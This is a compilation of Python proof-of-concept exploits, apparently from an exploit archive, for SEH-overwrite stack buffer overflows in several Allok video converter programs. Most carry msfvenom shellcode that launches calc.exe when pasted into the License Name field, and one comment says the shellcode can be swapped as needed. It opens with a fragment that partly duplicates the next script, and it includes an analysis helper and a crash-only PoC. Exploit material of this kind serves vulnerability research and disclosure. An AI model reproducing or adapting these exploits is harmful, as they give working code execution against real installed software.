shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b"
shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2"
shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92"
shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a"
shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74"
shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37"
shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28"
shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60"
shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc"
shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59"
shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4"
shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47"

# Build the buffer as bytes and write it in binary mode so the payload
# bytes are not re-encoded as text (shellcode_calc above is already bytes).
poc = b""
poc += b"A" * nseh_offset
poc += b"\xEB\x0b\x90\x90"   # nSEH: short jmp +0x0b forward, into the NOP sled
poc += b"\x59\x78\x03\x10"   # SEH: pop pop ret (0x10037859, little-endian)
poc += b"\x90" * 20          # NOP sled
poc += shellcode_calc
poc += b"D" * (total - len(poc))

file = open("poc_seh.txt", "wb")
file.write(poc)
file.close()
            
#!/usr/bin/python
# Exploit Title: Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.alloksoft.com
# Software Link: https://www.alloksoft.com/allok_rmconverter.exe
# Version: 3.6.1217
# Tested on: Windows 7 SP1 32-bit

# Copy and paste the contents of poc_seh.txt into the License Name input field
# of Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 to execute calc.exe.

nseh_offset = 780
total = 1000

# msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread
shellcode_calc =  b""
shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24"
shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97"
shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d"
shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01"
shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58"
shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52"
shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95"
shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22"
shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73"
shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b"
shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2"
shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92"
shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a"
shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74"
shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37"
shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28"
shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60"
shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc"
shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59"
shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4"
shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47"

# Build the buffer as bytes and write it in binary mode so the payload
# bytes are not re-encoded as text (shellcode_calc above is already bytes).
poc = b""
poc += b"A" * nseh_offset
poc += b"\xEB\x0b\x90\x90"   # nSEH: short jmp +0x0b forward, into the NOP sled
poc += b"\x11\x7b\x03\x10"   # SEH: pop pop ret (0x10037b11, little-endian)
poc += b"\x90" * 20          # NOP sled
poc += shellcode_calc
poc += b"D" * (total - len(poc))

file = open("poc_seh.txt", "wb")
file.write(poc)
file.close()
            
# SWAMI KARUPASAMI THUNAI

###############################################################################
# Exploit Title:        Allok Video Converter - Buffer Overflow Vulnerability (Windows XP SP3)
# Date:                 06-03-2018
# Exploit Author:       Mohan Ravichandran & Velayutham Selvaraj
# Organization :        TwinTech Solutions
# Vulnerable Software:  Allok Video Converter
# Vendor Homepage:      http://www.alloksoft.com
# Version:              4.6.1217
# Software Link:        http://www.alloksoft.com/allok_vconverter.exe
# Tested On:            Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the Vulnerability
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ... 
#1.  Download and install the "setup(allok_vconverter.exe)" file
#2.  Run this exploit code via python 2.7
#3.  A file "exploit.txt" will be created
#4.  Copy the contents of the file and paste in the License Name field 
#    Name > exploit.txt
#5.  Type some random character in License Code
#6.  Click Register and voila!
#7.  Boom calculator opens
#
##############################################################################
import struct

# Python 2 script (see step 2 above): str literals are raw byte strings,
# so the high bytes below reach the file unchanged.
file = open("exploit.txt","wb")
buflen = 4000
junk = "A" * 780                     # padding up to the nSEH field
nseh = "\x90\x90\xeb\x10"            # nSEH: two NOPs, then short jmp +0x10 into the NOP sled
seh  = struct.pack("<L",0x10019A09)  # SEH handler address, packed little-endian
nops = "\x90" * 20                   # NOP sled the short jmp lands in
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()
            
# Exploit Title: Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)
# Date: 2018-07-29
# Discovery by: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link: http://www.alloksoft.com/allok_movconverter.exe
# Tested Version: 4.6.1217
# Tested on OS: Windows XP Service Pack 3 x86
# Greetz: @hexachordanu @FuzzySec @LiveOverflow

# Steps to Reproduce: Run the python exploit script; it will create a new
# file with the name "exploit.txt". Copy the text inside "exploit.txt",
# start the Allok MOV Converter 4.6.1217 program, paste the content of
# "exploit.txt" into the License Name field and click on Register.
# You will see a sweet calculator popped up.

# Python 2 script: str literals are raw byte strings, written unchanged.
file = open("exploit.txt","wb")
junk = "\x41" * 780        # padding up to the nSEH field
nseh = "\xeb\x10\x90\x90"  # nSEH: short jmp +0x10 into the NOP sled
seh = "\x79\x25\x01\x76"   # SEH handler 0x76012579, little-endian

nops = "\x90" * 16         # NOP sled the short jmp lands in

#badchar \x00\x08\x09\x0a\x0b\x0c\x0d
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x08\x09\x0a\x0b\x0c\x0d' -f python
buf =  ""
buf += "\xba\xbb\xf0\xaa\x11\xdd\xc3\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xb4\x12"
buf += "\x5f\xed\x22\x50\xa0\x0e\xb2\x35\x28\xeb\x83\x75\x4e"
buf += "\x7f\xb3\x45\x04\x2d\x3f\x2d\x48\xc6\xb4\x43\x45\xe9"
buf += "\x7d\xe9\xb3\xc4\x7e\x42\x87\x47\xfc\x99\xd4\xa7\x3d"
buf += "\x52\x29\xa9\x7a\x8f\xc0\xfb\xd3\xdb\x77\xec\x50\x91"
buf += "\x4b\x87\x2a\x37\xcc\x74\xfa\x36\xfd\x2a\x71\x61\xdd"
buf += "\xcd\x56\x19\x54\xd6\xbb\x24\x2e\x6d\x0f\xd2\xb1\xa7"
buf += "\x5e\x1b\x1d\x86\x6f\xee\x5f\xce\x57\x11\x2a\x26\xa4"
buf += "\xac\x2d\xfd\xd7\x6a\xbb\xe6\x7f\xf8\x1b\xc3\x7e\x2d"
buf += "\xfd\x80\x8c\x9a\x89\xcf\x90\x1d\x5d\x64\xac\x96\x60"
buf += "\xab\x25\xec\x46\x6f\x6e\xb6\xe7\x36\xca\x19\x17\x28"
buf += "\xb5\xc6\xbd\x22\x5b\x12\xcc\x68\x31\xe5\x42\x17\x77"
buf += "\xe5\x5c\x18\x27\x8e\x6d\x93\xa8\xc9\x71\x76\x8d\x26"
buf += "\x38\xdb\xa7\xae\xe5\x89\xfa\xb2\x15\x64\x38\xcb\x95"
buf += "\x8d\xc0\x28\x85\xe7\xc5\x75\x01\x1b\xb7\xe6\xe4\x1b"
buf += "\x64\x06\x2d\x78\xeb\x94\xad\x51\x8e\x1c\x57\xae"

more = "\x41" * 100
exploit = junk + nseh + seh + nops + buf + more

file.write(exploit)
file.close()
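Added here as a triage helper, not code from any of the advisories on this page: given the bytes of one of the generated PoC files and the padding length the author reports, it decodes the nSEH short jump and the SEH handler address and checks whether the jump really lands inside the NOP sled, which is the first thing to confirm when reproducing one of these crash reports under a debugger. The sample input is constructed to mirror the layout above (780-byte padding, jmp +0x0b, handler 0x10037859, 20 NOPs, placeholder bytes in place of shellcode); the function name and result keys are my own.

```python
import struct


def analyze_seh_layout(data, nseh_offset, nop_count=20):
    """Describe the nSEH/SEH overwrite layout found in a PoC buffer.

    data        -- bytes of the generated PoC file
    nseh_offset -- padding bytes before the nSEH field (780 in the PoCs above)
    nop_count   -- length of the NOP sled following the SEH field
    Returns a dict (keys are this helper's own naming, not from the page).
    """
    nseh = data[nseh_offset:nseh_offset + 4]
    seh = data[nseh_offset + 4:nseh_offset + 8]
    if len(nseh) != 4 or len(seh) != 4:
        raise ValueError("buffer too short for an nSEH/SEH pair")
    handler = struct.unpack("<L", seh)[0]      # SEH is stored little-endian
    # The two-byte short jump (EB disp8) sits either at the start of nSEH
    # or after two NOPs; both forms appear in the PoCs above.
    jmp_pos = nseh.find(b"\xeb")
    if jmp_pos < 0 or jmp_pos > 2:
        raise ValueError("no short jump found in nSEH")
    disp = struct.unpack("<b", nseh[jmp_pos + 1:jmp_pos + 2])[0]
    # disp8 is relative to the end of the 2-byte jmp instruction.
    target = nseh_offset + jmp_pos + 2 + disp
    sled_start = nseh_offset + 8
    sled_end = sled_start + nop_count
    lands_in_sled = (sled_start <= target < sled_end
                     and data[target:target + 1] == b"\x90")
    return {
        "handler": handler,
        "jump_target": target,
        "lands_in_sled": lands_in_sled,
        "payload_offset": sled_end,
    }


# Constructed sample mirroring the layout above: 780 bytes of padding,
# nSEH = jmp +0x0b, SEH = 0x10037859, 20 NOPs, then placeholder bytes
# (int3) where the real PoC carries shellcode.
SAMPLE = (b"A" * 780 + b"\xeb\x0b\x90\x90" + struct.pack("<L", 0x10037859)
          + b"\x90" * 20 + b"\xcc" * 32)

if __name__ == "__main__":
    print(analyze_seh_layout(SAMPLE, 780))
```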
            
#!/usr/bin/env python
# Exploit Title: Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC
# Vulnerability Type: SEH Overwrite POC
# Discovery by: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovery Date: 2018-08-01
# Software Link: http://www.alloksoft.com/fast_splitter.htm
# Tested Version: 1.2
# Tested on OS: Windows XP Service Pack 3 x86

# Steps to Reproduce:
# Run the python exploit.py, open "exploit.txt" and copy its content.
# Open Fast AVI MPEG Splitter; a registration prompt will appear.
# In the License field paste the content of "exploit.txt".
# Press "OK" and B00m Crashed.

# SEH chain of main thread, item 0
# Address=00129B78
# SE handler=43434343
# SEH chain of main thread, item 1
# Address=42424242
# SE handler=*** CORRUPT ENTRY ***
buffer = "\x41" * 544      # padding up to the nSEH field
nseh = "\x42\x42\x42\x42"  # overwrites nSEH (42424242 in the chain above)
seh = "\x43\x43\x43\x43"   # overwrites the SE handler (43434343 above)

exploit = buffer + nseh + seh
f = open("exploit.txt", "w")
f.write(exploit)
f.close()